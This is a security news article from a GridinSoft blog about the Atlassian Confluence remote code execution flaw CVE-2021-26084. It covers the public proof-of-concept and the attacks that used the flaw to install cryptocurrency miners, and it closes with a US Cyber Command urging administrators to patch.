Atlassian Confluence vulnerability was exploited to install miners

Atlassian Confluence vulnerability

In late August, Atlassian released a hotfix for a Confluence Remote Code Execution (RCE) vulnerability.

The issue has ID CVE-2021-26084 and allows an unauthenticated attacker to remotely execute commands on a vulnerable server.

The issue has been reported to be dangerous for all versions of Confluence Server and Data Center.

After the patch was released, the researcher who found the vulnerability presented a detailed description of it, attaching a PoC exploit to his report.

Looking at the shell script it was clear that there were a few *.vm files that were modified with a bit of string match and replace which implied the vulnerability should lie somewhere inside them. We quickly grabbed the unpatched version (7.12.4) of Confluence Server, unzipped and to be just sure that we understood the patch correctly, we created a copy of the confluence server and applied the patch script on that copy.said the researcher under the pseudonym rootxharsh.

The exploit written in PHP turned out to be easy to use and really allows executing commands on the target server. Attackers can use this to upload other malware, web shells, or launch programs to a vulnerable server.

Shortly after the publication of the report and the exploit, security experts began to report that cybercriminals and information security researchers were actively scanning the network in search of vulnerable Confluence servers. For example, experts at Bad discovered that attackers from different countries were exploiting servers to download and run PowerShell and Linux shell scripts. Thus, hackers try to install miners on servers running Windows and Linux.

While the attacks currently mostly target mining cryptocurrencies, the researchers warn that there is no reason for attackers not to exploit this vulnerability for other purposes, including more sophisticated attacks. This is also warned by the US Cyber Command, which expects that the situation will only continue to deteriorate:

The massive exploitation of CVE-2021-26084 at Atlassian Confluence continues and [the rate of exploitation] is expected to accelerate. Please fix the vulnerability immediately, if you have not already done so, it will not wait until the end of the holidays.Cyber Command representatives warned on Twitter ahead of Labor Day.

Let me also remind you that the Atlassian vulnerability was included in the list of 15 most attacked Linux vulnerabilities.

By Vladimir Krasnogolovy

Vladimir is a technical specialist who loves giving qualified advices and tips on GridinSoft's products. He's available 24/7 to assist you in any question regarding internet security.

Leave a comment

Your email address will not be published. Required fields are marked *